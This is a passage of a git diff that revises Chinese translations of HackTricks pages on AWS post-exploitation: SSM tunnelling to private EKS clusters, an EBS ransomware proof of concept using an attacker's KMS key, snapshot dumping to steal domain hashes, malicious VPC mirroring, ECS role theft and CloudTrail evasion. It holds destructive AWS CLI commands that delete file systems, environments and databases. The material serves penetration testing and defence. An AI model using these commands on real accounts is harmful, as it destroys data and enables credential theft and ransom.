-其中一个有用的场景是从 [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) 转发到私有 EKS 集群。
+除了命令执行,SSM 还允许流量隧道,这可以被滥用以从由于安全组或 NACL 而没有网络访问的 EC2 实例进行转发。一个有用的场景是从 [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) 转发到私有 EKS 集群。
-> 为了开始会话,您需要安装 SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
+> 要开始会话,您需要安装 SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
-1. 在您的机器上安装 SessionManagerPlugin
-2. 使用以下命令登录到 Bastion EC2:
+1. 在您的机器上安装 SessionManagerPlugin
+2. 使用以下命令登录到 Bastion EC2:
```shell
aws ssm start-session --target "$INSTANCE_ID"
```
3. 使用 [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) 脚本获取 Bastion EC2 AWS 临时凭证
-4. 将凭证转移到您自己的机器中的 `$HOME/.aws/credentials` 文件,作为 `[bastion-ec2]` 配置文件
-5. 以 Bastion EC2 身份登录 EKS:
+4. 将凭证转移到您自己的机器,存储在 `$HOME/.aws/credentials` 文件中,作为 `[bastion-ec2]` 配置
+5. 作为 Bastion EC2 登录 EKS:
```shell
aws eks update-kubeconfig --profile bastion-ec2 --region --name
```
@@ -120,11 +119,11 @@ sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortFo
```shell
kubectl get pods --insecure-skip-tls-verify
```
-注意,SSL 连接将失败,除非您设置 `--insecure-skip-tls-verify` 标志(或其在 K8s 审计工具中的等效项)。由于流量通过安全的 AWS SSM 隧道进行隧道传输,您可以免受任何类型的中间人攻击。
+请注意,SSL 连接将失败,除非您设置 `--insecure-skip-tls-verify` 标志(或其在 K8s 审计工具中的等效项)。由于流量通过安全的 AWS SSM 隧道进行隧道传输,您可以免受任何类型的中间人攻击。
最后,这种技术并不特定于攻击私有 EKS 集群。您可以设置任意域和端口,以便转向任何其他 AWS 服务或自定义应用程序。
-### 分享 AMI
+### Share AMI
```bash
aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region
```
@@ -138,9 +137,9 @@ aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-pe
```
### EBS Ransomware PoC
-一个类似于在 S3 后渗透笔记中演示的勒索软件演示的概念验证。KMS 应该被重新命名为 RMS(勒索软件管理服务),因为使用它加密各种 AWS 服务是如此简单。
+一个类似于在 S3 后渗透笔记中演示的勒索软件演示的概念验证。KMS 应该被重命名为 RMS(勒索软件管理服务),因为使用它加密各种 AWS 服务是如此简单。
-首先,从一个“攻击者”的 AWS 账户中,在 KMS 中创建一个客户管理的密钥。在这个例子中,我们将让 AWS 为我管理密钥数据,但在现实场景中,恶意行为者会将密钥数据保留在 AWS 控制之外。更改密钥策略以允许任何 AWS 账户主体使用该密钥。对于这个密钥策略,账户的名称是 'AttackSim',允许所有访问的策略规则称为 'Outside Encryption'。
+首先,从一个“攻击者”的 AWS 账户中,在 KMS 中创建一个客户管理密钥。在这个例子中,我们将让 AWS 为我管理密钥数据,但在现实场景中,恶意行为者会将密钥数据保留在 AWS 控制之外。更改密钥策略以允许任何 AWS 账户主体使用该密钥。对于这个密钥策略,账户的名称是 'AttackSim',允许所有访问的策略规则称为 'Outside Encryption'。
```
{
"Version": "2012-10-17",
@@ -232,7 +231,7 @@ aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-pe
]
}
```
-密钥策略规则需要启用以下内容,以便能够使用它来加密 EBS 卷:
+密钥策略规则需要启用以下功能,以便能够使用它来加密 EBS 卷:
- `kms:CreateGrant`
- `kms:Decrypt`
@@ -244,7 +243,7 @@ aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-pe
 
-类似于 S3 勒索软件的例子。这次攻击将使用快照创建附加 EBS 卷的副本,使用“攻击者”账户中的公开可用密钥加密新的 EBS 卷,然后从 EC2 实例中分离并删除原始 EBS 卷,最后删除用于创建新加密 EBS 卷的快照。 
+类似于 S3 勒索软件的例子。这次攻击将使用快照创建附加 EBS 卷的副本,使用“攻击者”账户中的公开可用密钥加密新的 EBS 卷,然后从 EC2 实例中分离原始 EBS 卷并删除它们,最后删除用于创建新加密 EBS 卷的快照。 
这导致账户中只剩下加密的 EBS 卷。
@@ -325,7 +324,7 @@ aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-pe
]
}
```
-等待新设置的密钥策略传播。然后返回到“受害者”账户,尝试附加一个新加密的EBS卷。你会发现你可以附加该卷。
+稍等片刻,让新设置的密钥策略传播。然后返回到“受害者”账户,尝试附加一个新加密的EBS卷。你会发现你可以附加该卷。
 
@@ -333,7 +332,7 @@ aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-pe
 
-这是使用的python脚本。它获取“受害者”账户的AWS凭证和用于加密的公开可用AWS ARN值。该脚本将对目标AWS账户中所有EC2实例附加的所有可用EBS卷进行加密副本,然后停止每个EC2实例,分离原始EBS卷,删除它们,最后删除在此过程中使用的所有快照。这将只在目标“受害者”账户中留下加密的EBS卷。仅在测试环境中使用此脚本,它是破坏性的,并将删除所有原始EBS卷。你可以使用所使用的KMS密钥恢复它们,并通过快照将它们恢复到原始状态,但我只是想让你意识到,这在最终是一个勒索软件的概念验证。
+这是使用的python脚本。它获取“受害者”账户的AWS凭证和一个公开可用的AWS ARN值,用于加密的密钥。该脚本将对目标AWS账户中所有附加到所有EC2实例的可用EBS卷进行加密副本,然后停止每个EC2实例,分离原始EBS卷,删除它们,最后删除在此过程中使用的所有快照。这将只在目标“受害者”账户中留下加密的EBS卷。仅在测试环境中使用此脚本,它是破坏性的,并将删除所有原始EBS卷。你可以使用所用的KMS密钥恢复它们,并通过快照将它们恢复到原始状态,但我只是想让你意识到,这最终是一个勒索软件的概念验证。
```
import boto3
import argparse
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
index 95a90a179..a7745cde2 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -2,7 +2,7 @@
{{#include ../../../../banners/hacktricks-training.md}}
-## 本地检查快照
+## 在本地检查快照
```bash
# Install dependencies
pip install 'dsnap[cli]'
@@ -54,16 +54,16 @@ aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
```bash
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```
-**在您控制的 EC2 虚拟机中挂载它**(它必须与备份的副本位于同一区域):
+**在您控制下的 EC2 虚拟机中挂载它**(它必须与备份的副本位于同一区域):
-步骤 1:通过前往 EC2 –> 卷,创建一个您喜欢的大小和类型的新卷。
+步骤 1:通过前往 EC2 –> Volumes 创建一个您喜欢大小和类型的新卷。
要执行此操作,请遵循以下命令:
- 创建一个 EBS 卷以附加到 EC2 实例。
- 确保 EBS 卷和实例位于同一区域。
-步骤 2:通过右键单击创建的卷,选择“附加卷”选项。
+步骤 2:通过右键单击创建的卷选择“附加卷”选项。
步骤 3:从实例文本框中选择实例。
@@ -71,11 +71,11 @@ aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snaps
- 附加 EBS 卷。
-步骤 4:登录到 EC2 实例,并使用命令 `lsblk` 列出可用磁盘。
+步骤 4:登录到 EC2 实例并使用命令 `lsblk` 列出可用磁盘。
步骤 5:使用命令 `sudo file -s /dev/xvdf` 检查卷是否有任何数据。
-如果上述命令的输出显示 "/dev/xvdf: data",则表示卷是空的。
+如果上述命令的输出显示 "/dev/xvdf: data",则表示该卷为空。
步骤 6:使用命令 `sudo mkfs -t ext4 /dev/xvdf` 将卷格式化为 ext4 文件系统。或者,您也可以使用命令 `sudo mkfs -t xfs /dev/xvdf` 使用 xfs 格式。请注意,您应该使用 ext4 或 xfs 中的任意一种。
@@ -122,7 +122,7 @@ ls /mnt
```
## Shadow Copy
-任何拥有 **`EC2:CreateSnapshot`** 权限的 AWS 用户都可以通过创建 **域控制器的快照**,将其挂载到他们控制的实例上,并 **导出 NTDS.dit 和 SYSTEM** 注册表蜂巢文件,以窃取所有域用户的哈希值,供 Impacket 的 secretsdump 项目使用。
+任何拥有 **`EC2:CreateSnapshot`** 权限的 AWS 用户都可以通过创建 **域控制器的快照**,将其挂载到他们控制的实例上,并 **导出 NTDS.dit 和 SYSTEM** 注册表蜂巢文件,从而窃取所有域用户的哈希值,以供 Impacket 的 secretsdump 项目使用。
您可以使用此工具来自动化攻击:[https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy),或者在创建快照后使用之前的技术之一。
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
index 765c1d31e..f7fa544f9 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
@@ -1,15 +1,15 @@
-# AWS - Malicious VPC Mirror
+# AWS - 恶意 VPC 镜像
{{#include ../../../../banners/hacktricks-training.md}}
-**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
+**查看** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **以获取攻击的更多细节!**
-在云环境中进行被动网络检查一直是**具有挑战性的**,需要对网络流量进行重大配置更改。然而,AWS引入了一项名为“**VPC流量镜像**”的新功能,以简化此过程。通过VPC流量镜像,可以**复制**VPC内的网络流量,而无需在实例上安装任何软件。这些复制的流量可以发送到网络入侵检测系统(IDS)进行**分析**。
+在云环境中被动网络检查一直是**具有挑战性的**,需要进行重大配置更改以监控网络流量。然而,AWS 引入了一项名为“**VPC 流量镜像**”的新功能,以简化此过程。通过 VPC 流量镜像,可以在 VPC 内部**复制**网络流量,而无需在实例上安装任何软件。这些复制的流量可以发送到网络入侵检测系统(IDS)进行**分析**。
-为了满足**自动部署**镜像和提取VPC流量所需基础设施的需求,我们开发了一个名为“**malmirror**”的概念验证脚本。该脚本可以与**被攻陷的AWS凭证**一起使用,以在目标VPC中为所有支持的EC2实例设置镜像。需要注意的是,VPC流量镜像仅支持由AWS Nitro系统提供支持的EC2实例,并且VPC镜像目标必须与被镜像主机位于同一VPC中。
+为了满足**自动部署**镜像和提取 VPC 流量所需基础设施的需求,我们开发了一个名为“**malmirror**”的概念验证脚本。该脚本可以与**被攻陷的 AWS 凭证**一起使用,以在目标 VPC 中为所有支持的 EC2 实例设置镜像。需要注意的是,VPC 流量镜像仅支持由 AWS Nitro 系统提供支持的 EC2 实例,并且 VPC 镜像目标必须与被镜像主机位于同一 VPC 中。
-恶意VPC流量镜像的**影响**可能是显著的,因为它允许攻击者访问在VPC中传输的**敏感信息**。考虑到VPC中存在**明文流量**,这种恶意镜像的**可能性**很高。许多公司在其内部网络中使用明文协议以**性能原因**,假设传统的中间人攻击是不可能的。
+恶意 VPC 流量镜像的**影响**可能是显著的,因为它允许攻击者访问在 VPC 内传输的**敏感信息**。考虑到 VPC 中存在**明文流量**,这种恶意镜像的**可能性**很高。许多公司在其内部网络中使用明文协议出于**性能原因**,假设传统的中间人攻击是不可能的。
-有关更多信息和访问[**malmirror脚本**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror),可以在我们的**GitHub存储库**中找到。该脚本自动化并简化了该过程,使其对攻击性研究目的**快速、简单且可重复**。
+有关更多信息和访问 [**malmirror 脚本**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror),可以在我们的**GitHub 仓库**中找到。该脚本自动化并简化了该过程,使其对攻击性研究目的**快速、简单且可重复**。
{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
index 54a2f7f6d..b11c948e6 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
@@ -13,7 +13,7 @@
### 主机 IAM 角色
在 ECS 中,**IAM 角色可以分配给在容器内运行的任务**。**如果**任务在 **EC2** 实例内运行,**EC2 实例**将附加 **另一个 IAM** 角色。\
-这意味着如果你成功 **攻陷** 一个 ECS 实例,你可能会 **获得与 ECR 和 EC2 实例相关联的 IAM 角色**。有关如何获取这些凭据的更多信息,请查看:
+这意味着如果你成功 **攻陷** 一个 ECS 实例,你可能会 **获取与 ECR 和 EC2 实例相关联的 IAM 角色**。有关如何获取这些凭据的更多信息,请查看:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -24,21 +24,21 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### 提权到节点以窃取其他容器的凭据和秘密
-此外,EC2 使用 docker 来运行 ECs 任务,因此如果你能够逃逸到节点或 **访问 docker 套接字**,你可以 **检查** 哪些 **其他容器** 正在运行,甚至可以 **进入它们** 并 **窃取** 附加的 IAM 角色。
+此外,EC2 使用 docker 来运行 ECs 任务,因此如果你能够逃逸到节点或 **访问 docker 套接字**,你可以 **检查** 运行的 **其他容器**,甚至 **进入它们** 并 **窃取它们附加的 IAM 角色**。
-#### 使容器在当前主机上运行
+#### 在当前主机上运行容器
-此外,**EC2 实例角色**通常会拥有足够的 **权限** 来 **更新集群内作为节点使用的 EC2 实例的容器实例状态**。攻击者可以将 **实例的状态修改为 DRAINING**,然后 ECS 将 **从中移除所有任务**,而作为 **REPLICA** 运行的任务将 **在不同的实例中运行,** 可能在 **攻击者的实例** 内,这样他就可以 **窃取它们的 IAM 角色** 和潜在的敏感信息。
+此外,**EC2 实例角色**通常会有足够的 **权限** 来 **更新作为集群内节点使用的 EC2 实例的容器实例状态**。攻击者可以将 **实例的状态修改为 DRAINING**,然后 ECS 将 **从中移除所有任务**,而作为 **REPLICA** 运行的任务将 **在不同的实例中运行,** 可能在 **攻击者的实例内**,这样他就可以 **窃取它们的 IAM 角色** 和潜在的敏感信息。
```bash
aws ecs update-container-instances-state \
--cluster --status DRAINING --container-instances
```
-相同的技术可以通过 **从集群中注销 EC2 实例** 来实现。这可能不那么隐蔽,但它将 **强制任务在其他实例中运行:**
+相同的技术可以通过**将EC2实例从集群中注销**来实现。这可能不那么隐蔽,但它将**强制任务在其他实例中运行:**
```bash
aws ecs deregister-container-instance \
--cluster --container-instance --force
```
-一种强制重新执行任务的最终技术是通过指示ECS **任务或容器已停止**。有3个潜在的API可以做到这一点:
+强制重新执行任务的最终技术是通过指示ECS **任务或容器已停止**。有3个潜在的API可以做到这一点:
```bash
# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster \
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
index 466275cf4..0ea134054 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
@@ -12,7 +12,7 @@
### `elasticfilesystem:DeleteMountTarget`
-攻击者可以删除挂载目标,可能会干扰依赖该挂载目标的应用程序和用户对 EFS 文件系统的访问。
+攻击者可以删除挂载目标,可能会中断依赖该挂载目标的应用程序和用户对 EFS 文件系统的访问。
```sql
aws efs delete-mount-target --mount-target-id
```
@@ -20,7 +20,7 @@ aws efs delete-mount-target --mount-target-id
### `elasticfilesystem:DeleteFileSystem`
-攻击者可以删除整个 EFS 文件系统,这可能导致数据丢失并影响依赖该文件系统的应用程序。
+攻击者可能会删除整个 EFS 文件系统,这可能导致数据丢失并影响依赖于该文件系统的应用程序。
```perl
aws efs delete-file-system --file-system-id
```
@@ -36,7 +36,7 @@ aws efs update-file-system --file-system-id --provisioned-throughput-in-
### `elasticfilesystem:CreateAccessPoint` 和 `elasticfilesystem:DeleteAccessPoint`
-攻击者可以创建或删除访问点,改变访问控制,并可能授予自己对文件系统的未经授权访问。
+攻击者可以创建或删除访问点,改变访问控制,并可能授予自己对文件系统的未经授权的访问权限。
```arduino
aws efs create-access-point --file-system-id --posix-user --root-directory
aws efs delete-access-point --access-point-id
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
index 54d0c9047..ef7fd4f02 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
@@ -23,7 +23,7 @@ aws eks update-kubeconfig --name aws-eks-dev
```
- 不是那么简单的方法:
-如果你可以 **获取一个令牌** 使用 **`aws eks get-token --name `** 但你没有权限获取集群信息 (describeCluster),你可以 **准备你自己的 `~/.kube/config`**。然而,拥有令牌后,你仍然需要 **连接的 URL 端点** (如果你设法从一个 pod 获取了 JWT 令牌,请阅读 [这里](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) 和 **集群的名称**。
+如果你可以 **获取一个令牌** 使用 **`aws eks get-token --name `** 但你没有权限获取集群信息 (describeCluster),你可以 **准备你自己的 `~/.kube/config`**。然而,拥有令牌后,你仍然需要 **连接的 url 端点** (如果你设法从 pod 获取了 JWT 令牌,请 [在这里](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token) 阅读) 和 **集群的名称**。
在我的案例中,我没有在 CloudWatch 日志中找到信息,但我 **在 LaunchTemplates 的 userData 中找到了它**,并且在 **EC2 机器的 userData 中也找到了**。你可以很容易地在 **userData** 中看到这些信息,例如在下一个示例中(集群名称是 cluster-name):
```bash
@@ -72,14 +72,14 @@ provideClusterInfo: false
### 从 AWS 到 Kubernetes
-**EKS 集群**的**创建者****总是**能够进入**`system:masters`**组的 Kubernetes 集群部分(k8s 管理员)。在撰写本文时,**没有直接的方法**来查找**谁创建了**该集群(您可以检查 CloudTrail)。并且**无法****移除**该**权限**。
+**EKS 集群**的**创建者****总是**能够进入**`system:masters`**组的 Kubernetes 集群部分(k8s 管理员)。在撰写本文时,**没有直接的方法**来查找**谁创建了**该集群(您可以检查 CloudTrail)。并且**无法**去**移除**该**权限**。
授予**更多 AWS IAM 用户或角色对 K8s 的访问权限**的方法是使用**configmap** **`aws-auth`**。
> [!WARNING]
-> 因此,任何对 config map **`aws-auth`**具有**写访问权限**的人都将能够**危害整个集群**。
+> 因此,任何对 config map **`aws-auth`**具有**写入权限**的人都将能够**危害整个集群**。
-有关如何在**同一或不同账户**中**授予 IAM 角色和用户额外权限**以及如何**滥用**此权限的更多信息,请查看[**privesc 检查此页面**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps)。
+有关如何在**同一或不同账户**中**授予 IAM 角色和用户额外权限**以及如何**滥用**此权限的信息,请查看[**privesc 检查此页面**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps)。
还可以查看[**这篇精彩的**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **文章以了解 IAM -> Kubernetes 的身份验证是如何工作的**。
@@ -93,7 +93,7 @@ provideClusterInfo: false
```bash
https://...eks.amazonaws.com
```
-没有找到任何文档来解释“两个字符”和“数字”的标准。但我自己进行了一些测试,发现这些是重复出现的:
+没有找到任何文档来解释“两个字符”和“数字”的标准。但根据我自己的测试,我发现这些是重复出现的:
- gr7
- yl4
@@ -119,11 +119,11 @@ f.write('\n'.join(result))
wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com
```
> [!WARNING]
-> 记得替换 & 。
+> 请记得替换 & 。
### 绕过 CloudTrail
-如果攻击者获得了具有 **EKS 权限** 的 AWS 凭证。如果攻击者配置自己的 **`kubeconfig`**(不调用 **`update-kubeconfig`**),如前所述,**`get-token`** 不会在 CloudTrail 中生成日志,因为它不与 AWS API 交互(它只是本地创建令牌)。
+如果攻击者获得了具有 **EKS 权限** 的 AWS 凭证。如果攻击者配置自己的 **`kubeconfig`**(不调用 **`update-kubeconfig`**),如前所述,**`get-token`** 不会在 Cloudtrail 中生成日志,因为它不与 AWS API 交互(它只是本地创建令牌)。
因此,当攻击者与 EKS 集群交互时,**cloudtrail 不会记录与被盗用户及其访问相关的任何内容**。
@@ -131,12 +131,12 @@ wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws
### EKS 勒索?
-默认情况下,**创建**集群的 **用户或角色** **始终拥有集群的管理员权限**。这是 AWS 对 Kubernetes 集群的唯一“安全”访问。
+默认情况下,**创建**集群的 **用户或角色** **始终会拥有集群的管理员权限**。这是 AWS 对 Kubernetes 集群的唯一“安全”访问。
-因此,如果 **攻击者通过 Fargate 破坏了集群**,并 **删除了所有其他管理员**,并 **删除了创建**集群的 AWS 用户/角色,~~攻击者可能已经 **勒索了集群**~~**。
+因此,如果 **攻击者通过 fargate 破坏了集群**,并 **移除了所有其他管理员**,并 **删除了创建**集群的 AWS 用户/角色,~~攻击者可能已经 **勒索了集群**~~**。
> [!TIP]
-> 请注意,如果集群使用 **EC2 虚拟机**,则可能从 **节点** 获取管理员权限并恢复集群。
+> 请注意,如果集群使用 **EC2 VMs**,则可能从 **节点** 获取管理员权限并恢复集群。
>
> 实际上,如果集群使用 Fargate,您可以将 EC2 节点或将所有内容移动到 EC2 集群并通过访问节点中的令牌来恢复它。
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
index 6bbb031b8..5e1ebb581 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
@@ -26,18 +26,18 @@ aws elasticbeanstalk delete-application-version --application-name my-app --vers
> [!NOTE]
> TODO: 测试是否需要更多权限
-拥有权限 `elasticbeanstalk:TerminateEnvironment` 的攻击者可以**终止现有的 Elastic Beanstalk 环境**,导致应用程序停机,并且如果环境未配置备份,可能会导致数据丢失。
+拥有权限 `elasticbeanstalk:TerminateEnvironment` 的攻击者可以 **终止现有的 Elastic Beanstalk 环境**,导致应用程序停机,并且如果环境未配置备份,可能会导致数据丢失。
```bash
aws elasticbeanstalk terminate-environment --environment-name my-existing-env
```
-**潜在影响**:应用程序的停机、潜在的数据丢失和服务中断。
+**潜在影响**:应用程序停机、潜在数据丢失和服务中断。
### `elasticbeanstalk:DeleteApplication`
> [!NOTE]
> TODO: 测试是否需要更多权限
-拥有权限 `elasticbeanstalk:DeleteApplication` 的攻击者可以**删除整个 Elastic Beanstalk 应用程序**,包括其所有版本和环境。如果没有备份,此操作可能导致应用程序资源和配置的重大损失。
+拥有权限 `elasticbeanstalk:DeleteApplication` 的攻击者可以 **删除整个 Elastic Beanstalk 应用程序**,包括其所有版本和环境。如果没有备份,此操作可能导致应用程序资源和配置的重大损失。
```bash
aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
```
@@ -65,6 +65,6 @@ aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:
aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
```
-**潜在影响**:由于添加或删除标签,导致资源分配、计费或资源管理不正确。
+**潜在影响**:由于添加或删除标签,导致资源分配、计费或资源管理不正确。
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
index 97a579f6c..b92737ba4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
@@ -1,4 +1,4 @@
-# AWS - IAM Post Exploitation
+# AWS - IAM 后期利用
{{#include ../../../banners/hacktricks-training.md}}
@@ -10,15 +10,15 @@
../aws-services/aws-iam-enum.md
{{#endref}}
-## Confused Deputy Problem
+## 混淆代理问题
如果您**允许一个外部账户 (A)** 访问您账户中的**角色**,您可能对**谁可以确切访问该外部账户**几乎没有**可见性**。这是一个问题,因为如果另一个外部账户 (B) 可以访问外部账户 (A),那么**B 也可能能够访问您的账户**。
-因此,在允许外部账户访问您账户中的角色时,可以指定一个 `ExternalId`。这是一个“秘密”字符串,外部账户 (A) **需要指定**以**假设您组织中的角色**。由于**外部账户 B 不会知道这个字符串**,即使他可以访问 A,他也**无法访问您的角色**。
+因此,当允许外部账户访问您账户中的角色时,可以指定一个 `ExternalId`。这是一个“秘密”字符串,外部账户 (A) **需要指定**以**假设您组织中的角色**。由于**外部账户 B 不知道这个字符串**,即使他可以访问 A,他也**无法访问您的角色**。
.png)
.png)
.png)
https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png
--region
```
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
index d6e46c7e8..2d7ba7731 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
@@ -61,7 +61,7 @@ aws rds download-db-log-file-portion --db-instance-identifier target-instance --
### `rds:DeleteDBInstance`
-拥有这些权限的攻击者可以**对现有的 RDS 实例进行 DoS 攻击**。
+具有这些权限的攻击者可以**对现有的 RDS 实例进行 DoS 攻击**。
```bash
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
index bc8756e3b..ec7c4a247 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
@@ -12,26 +12,26 @@
### 敏感信息
-有时您可以在存储桶中找到可读的敏感信息。例如,terraform 状态机密。
+有时您可以在可读的桶中找到敏感信息。例如,terraform 状态机密。
-### 侧向渗透
+### 侧向移动
-不同的平台可能会使用 S3 存储敏感资产。\
-例如,**airflow** 可能会在其中存储 **DAGs** **代码**,或者 **网页** 可能会直接从 S3 提供服务。具有写入权限的攻击者可以 **修改存储桶中的代码** 以 **侧向渗透** 到其他平台,或 **接管账户** 修改 JS 文件。
+不同的平台可能使用 S3 存储敏感资产。\
+例如,**airflow** 可能在其中存储 **DAGs** **代码**,或者 **网页** 可能直接从 S3 提供服务。具有写入权限的攻击者可以 **修改桶中的代码** 以 **侧向移动** 到其他平台,或 **接管账户** 修改 JS 文件。
### S3 勒索软件
-在这种情况下,**攻击者在他们自己的 AWS 账户** 或另一个被攻陷的账户中创建一个 KMS(密钥管理服务)密钥。然后,他们使这个 **密钥对全世界的任何人可用**,允许任何 AWS 用户、角色或账户使用此密钥加密对象。然而,这些对象无法被解密。
+在这种情况下,**攻击者在他们自己的 AWS 账户** 或另一个被攻陷的账户中创建一个 KMS(密钥管理服务)密钥。然后,他们使这个 **密钥对全世界可用**,允许任何 AWS 用户、角色或账户使用此密钥加密对象。然而,这些对象无法被解密。
-攻击者识别一个目标 **S3 存储桶并获得写入级别的访问权限**,使用各种方法。这可能是由于糟糕的存储桶配置使其公开可见,或者攻击者获得了 AWS 环境本身的访问权限。攻击者通常针对包含敏感信息的存储桶,例如个人身份信息(PII)、受保护的健康信息(PHI)、日志、备份等。
+攻击者识别一个目标 **S3 桶并获得写入级别的访问权限**,使用各种方法。这可能是由于糟糕的桶配置使其公开可见,或者攻击者获得了 AWS 环境本身的访问权限。攻击者通常针对包含敏感信息的桶,例如个人可识别信息(PII)、受保护的健康信息(PHI)、日志、备份等。
